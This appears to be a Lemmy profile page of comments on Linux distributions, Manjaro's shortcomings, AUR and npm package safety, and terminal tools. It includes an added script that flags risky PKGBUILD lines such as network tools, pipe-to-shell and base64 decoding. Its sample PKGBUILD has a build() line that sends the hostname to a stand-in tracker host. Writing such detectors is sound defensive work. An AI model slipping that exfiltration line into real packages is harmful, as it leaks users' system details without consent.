Sorry, book broke

  • 29 Posts
  • 455 Comments
Joined 1 year ago
Cake day: June 11th, 2023

  • sorrybookbroke@sh.itjust.works to Linux@lemmy.ml · Linux middle ground? · 3 days ago

    The issue with that is potentially keeping software which has security bugs on your system for longer than needed. Also, if you install new software you’ll have a partial upgrade which can degrade your system. If you don’t install anything though, your system should work as it currently does without issue. Unless a particular app takes something from the internet which may need the upgraded software (say, Discord, Spotify, etc. as they’re Electron based.)

    If that’s what you want to do I would suggest switching to Xubuntu, Mint Xfce edition, DSL, etc. as they’ll still patch security updates in. You do you though of course, as with your stated use case I can’t see any functional issue. I don’t see the reason for Arch though.


  • sorrybookbroke@sh.itjust.works to Linux@lemmy.ml · Linux middle ground? · 3 days ago

    Sure, but that wasn’t malicious code hacking your device, just a simple phishing scheme. The AUR runs arbitrary code each time which can do quite a lot more on your system than any snap. That snap was just a fake app that sent your login to their server.

    The AUR is much more dangerous. Of course, when installing anything from anywhere be careful, but with the AUR you need to be able to read the PKGBUILD.

    Thank you though for cautioning the snap store as you’re right. Those apps aren’t confirmed before they’re placed on the store.


  • I wouldn’t suggest Manjaro. On a theoretical basis the distro is a good one but in practice, and with the current management of the distro, it’s one of the few I’d say is a bad choice. They’re destructive to the general Linux ecosystem, often make incredibly wild and unnecessary errors stemming from the highest level, do not properly maintain their promise of delaying packages until they’re fixed, and give bad info which can harm a user. Their devs also help propagate the “toxic Linux” stereotype by being just that.

    I’m gonna list off a few but manjarno has some more, with context. This will be written from memory too.

    Please, skip to the header that’s most important to you.

    Harming the ecosystem

    The first thing you’ll likely hear is that they’ve DDoS’d the AUR twice, the exact same way, through their Pamac GUI. Now, to be clear, this was not on purpose. They made a mistake. However, like quite a few other issues, they made this mistake twice, showing they did nothing to stop it from happening twice. Something else which will become clear is that they don’t do these things due to malice (usually) but sheer incompetence.

    Next, their lead ARM dev, the guy in charge of ARM development, changed a version on a library on Asahi Linux (an ARM fork) known to break X11 in a change which had nothing to do with that library. This shows he did not try running his code beforehand. The only reason it wasn’t checked by the larger project is due to the trust given to this, supposedly, high end dev. This after the company made a large campaign claiming that “Manjaro runs on the M1 MacBook!” months before Asahi was ready, shipping some random build, not the latest or a set release, which only showed a black screen. To be clear, this could have broken people who tried to run its hardware. This is in no way a forced error.

    Delayed package promise broke

    This will be a short header, but it’s important. The promise of Manjaro is that they delay their packages two weeks. This, to ensure that any issues which arise can be caught and Manjaro can skip the bad version. However, this is not always the case. Quite often there’s an issue in a library or package where they wait the allotted time and still ship. These are CVEs mostly and quite often have a fix out which Manjaro won’t ship until the two weeks are up.

    Delaying packages is another problem in and of itself too if you’re using the AUR. What is the AUR? Well, if you don’t know you shouldn’t be using it for one. The next header will discuss this issue.

    The AUR

    The AUR, the Arch User Repository, is a collection of scripts which install an application in many different ways. To be clear, this script can do anything on your PC as it’s just arbitrary code. This is user submitted, meaning essentially anyone can upload a script to the AUR including a person named anus kiss. This is a danger in many cases as we’ve seen before. For a fun example, anuskuss uploaded an update to the most popular Wii emulator’s AUR package which included two calls to an IP tracking website and a list of people who can “go fuck themselves” including homophobic comments and, if I remember, incel rage. The AUR will also be where any malware on Linux is most likely to come from and to be distributed there first.

    Luckily though, if you know how to read these scripts, it’s mostly fine. However, Manjaro places the button to enable it right next to enabling snaps and flatpaks. Both of which are perfectly safe to install if not safer than average packages. You need to be able to read the AUR package scripts to be safe.

    Secondly, the AUR packages assume Arch Linux. This means, when you install an AUR app, it’s assuming dependencies which may be up to two weeks out of date. Either that, or it’ll install packages up to two weeks early. Now, if the first happens the AUR package risks breaking. Which is mostly fine. The latter though means system packages can fail. This is not good.

    Sure, many people never have a problem with it, but that’s not an excuse. This should be much more clear.

    Bad info

    Please don’t use sudo pacman -Syyu to install packages. This will put a heavy load on the Arch repositories for no benefit. Please, don’t randomly install AUR packages. The AUR break your system? Yeah, according to them you fucked up and it’s all your fault. I’ll admit this is all I can remember here.

    Random points

    Ever find a site and when you try and go to it Firefox says a secure connection cannot be established? That’s an expired or nonexistent SSL cert. They’ve let their SSL certificates run out 5 times. This is something you can update in less than 5 minutes, and can set up to update automatically in less than 10. It should not happen twice let alone 5 times. The first time they gave users a command to run in a terminal which set their time back in order to trick the system into thinking the cert was good.

    Imma stop at this point. Way too long man, and it’s way too early for me. I should probably save this somewhere to copy paste when someone suggests the distro.
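
The comments above say you need to be able to read a PKGBUILD before building from the AUR, and mention an update that added calls to an IP tracking website. As an added example (not part of the original comments, and not code from Arch or Manjaro), this script lists the lines of a PKGBUILD that deserve a close read first; the pattern list and the sample PKGBUILD with its `.example` hosts are constructed assumptions.

```shell
#!/bin/sh
# Added example: list PKGBUILD lines that deserve a close read before running makepkg.
# The checks below are illustrative assumptions, not a complete policy; a clean
# result does not make a package safe, it only narrows where to look first.

# audit_pkgbuild [FILE]  (reads stdin when FILE is omitted)
# Prints LINE:REASON:TEXT for every flagged line.
audit_pkgbuild() {
    awk '
    function flag(reason) { printf "%d:%s:%s\n", NR, reason, $0 }
    /^[ \t]*#/    { next }                 # comments
    /^[ \t]*url=/ { next }                 # upstream homepage field, metadata only
    /^[ \t]*source(_[a-z0-9_]+)?=\(/ { in_src = 1 }   # URLs are expected in source=()
    {
        if (!in_src && $0 ~ /(^|[^A-Za-z0-9_-])(curl|wget|nc|ncat)[ \t]/) flag("network-tool")
        if (!in_src && $0 ~ /https?:\/\//)            flag("url-outside-source")
        if ($0 ~ /\|[ \t]*(ba|z)?sh([ \t]|$)/)        flag("pipe-to-shell")
        if ($0 ~ /base64[ \t]+(-d|--decode)/)         flag("encoded-payload")
        if ($0 ~ /(^|[ \t;])eval[ \t]/)               flag("eval")
        if ($0 ~ /^[ \t]*install=/)                   flag("install-hook")
        if (in_src && $0 ~ /\)/) in_src = 0           # end of the source array
    }' "$@"
}

# Constructed sample input: a PKGBUILD with a tracking request added to build().
sample_pkgbuild() {
    cat <<'EOF'
pkgname=example-emulator-git
pkgver=1.0
url="https://project.example"
source=("git+https://git.example/emulator.git"
        "fix.patch")
install=example.install
build() {
  cd emulator
  curl -s "http://tracker.example/log?h=$(hostname)" >/dev/null
  make
}
EOF
}

sample_pkgbuild | audit_pkgbuild
```

An `install-hook` hit means a separate `.install` script runs as root at install time, so that file needs the same read as the PKGBUILD itself.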


  • sorrybookbroke@sh.itjust.works to Linux@lemmy.ml · Linux middle ground? · 3 days ago

    Absolutely. Here are three options.

    Fedora updates every, or around every, 3 months. This is very stable but very up to date. Most professional devs, particularly ones working in Linux projects, use it for its relative stability while having modern packages.

    There’s also PopOS! which is a rolling release, updating daily, but much more delayed than Arch thus being much more usable.

    Now for my favourite, openSUSE Tumbleweed. Same style as PopOS but with a KDE or GNOME spin out of the box. A bit more sleek too. It also has YaST which is the best GUI based management system on Linux.

    I use Arch (btw) but have a second dual-booted Tumbleweed install for work related stuff in order to ensure stability.












  • Normally I’d say fuck Nintendo but Palworld obviously stole the designs and artistic direction for many of their characters.

    Most of the pals I saw at first were modified versions of an already existent Pokemon with little to separate it from fan art of that Pokemon. This is particularly egregious as they clashed against the rest of this game’s aesthetic. Nothing that was original fit with the design of the Pokemon rip offs.

    Many other games have a Pokemon-esque aesthetic without direct copying. It looking similar is not my issue. My issue is that while playing I could easily name most pals to a Pokemon. Seriously, look up comparisons. It’s blatant.

    They’ve moved away from this recently but fuck man if it ain’t obvious. If they did the same to some small project I’d assume people would be much more up in arms, rightfully so.

    Still though, I won’t cry if Nintendo loses. I hope they pay an insane amount in lawyers’ fees either way and never see a dime out of the case.


  • Yeah don’t worry about it too much. Ensure you have the correct name when installing your library but that’s about all you can do personally.

    Any other solution will have some security flaws. NPM has a few more than it should but essentially the entire web is built around it. Sorry man, you don’t have any other choices.

    How to use it properly? Any npm tutorial will show you quickly. Always check you’ve got the right thing, always check the library is large enough that if something goes wrong it’ll be noticed, and know there’s no way to be completely safe without never using libraries.

    If you’re learning the web though there’s no way to avoid npm.




  • Edit: these suggestions are last resort type stuff tbf, hope the guys in the other thread are more help. Looks like someone suggested session restore w/ KDE which makes a lot of sense.

    Ok that’s incredibly weird. Here’s some places I’d look.

    I’d start looking in environment files such as ~/.bash_profile, ~/.profile, /etc/environment, /etc/profile and a few others. Maybe there’s a call to the application in one of these files?

    Secondly, I’d attempt to write a bash script to walk a directory tree, cat out files, pipe it through grep and get every instance where VirtualBox is mentioned in a file. Trying the name of the process, or of the executable too.

    I have a snippet that may help, by replacing that bash script:
    grep -Rinw ~/path/to/start/ -e 'VirtualBoxOrSmthngElse'

    all credit to this answer on SO:
    https://stackoverflow.com/a/16957078/11534230

    Head there to see how to try and whittle down the matches. I’d start in etc, ignore binary files with grep, and try everywhere systematically.

    This is likely overkill lol. If you’re on Xorg maybe there’s something in the file Xorg uses for init? Can’t remember the name personally but I used it to start up some processes before on system boot quite a while ago.



  • You do make some good points on it being terminalside, you’ve partially changed my mind there. I see the value now.

    Also, you would be correct, anything that allowed collapsing commands would be trivial to implement some sort of action per command and its output. Along with collapsing being easiest to do terminalside.

    What I would love to see is a terminal that builds its own shell from scratch too, rejecting the ancient ideas we have with bash. I still love bash but I’m curious what could come of it.

    As for their luddite status, their reply to my previous comment seems to show them to be a bit more open.

    Seriously though thanks for the good conversation and thought exercise.


  • Konsole can display images, as can kitty, alacritty, wezterm, iterm2, etc. There’s quite a few formats to do so dating back decades. This isn’t new.

    As for collapsing a command and its output that’s nice, but it’s not exactly game changing.

    Lastly, searching explicitly your last command for a term with context would be much better suited to the shell to solve as it’d be terminal independent. Wouldn’t surprise me if under the hood it’s a bash script that takes whatever input you pass to bash, execs it, pipes stdout to tee, which passes it to a text file storing output and the console’s output too. Of course, you can always pipe it to fzf for a live grep with context if you have it set up right and remember to do so.

    I would agree just denying any advancements in favor of the “good ole way” is idiotic but nothing I’ve seen or that you’ve listed convinces me these are major advancements. Nor are these anything that couldn’t be solved at the shell’s level or with supplementary applications. Nice to have, if it weren’t electron or closed I would switch, but nothing groundbreaking.

    I doubt they’re outright rejecting any idea of progress. They’re likely just not convinced by what the fancy options offer.